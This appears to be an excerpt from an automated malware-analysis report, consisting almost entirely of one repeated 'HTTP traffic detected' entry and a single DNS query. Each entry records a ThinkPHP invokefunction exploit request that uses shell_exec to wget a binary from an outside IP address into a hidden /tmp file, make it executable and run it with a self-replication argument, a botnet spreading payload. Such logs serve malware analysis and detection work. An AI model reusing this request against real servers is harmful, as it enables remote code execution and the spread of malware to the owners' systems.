                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficDNS traffic detected: DNS query: vector.mineheaven.org
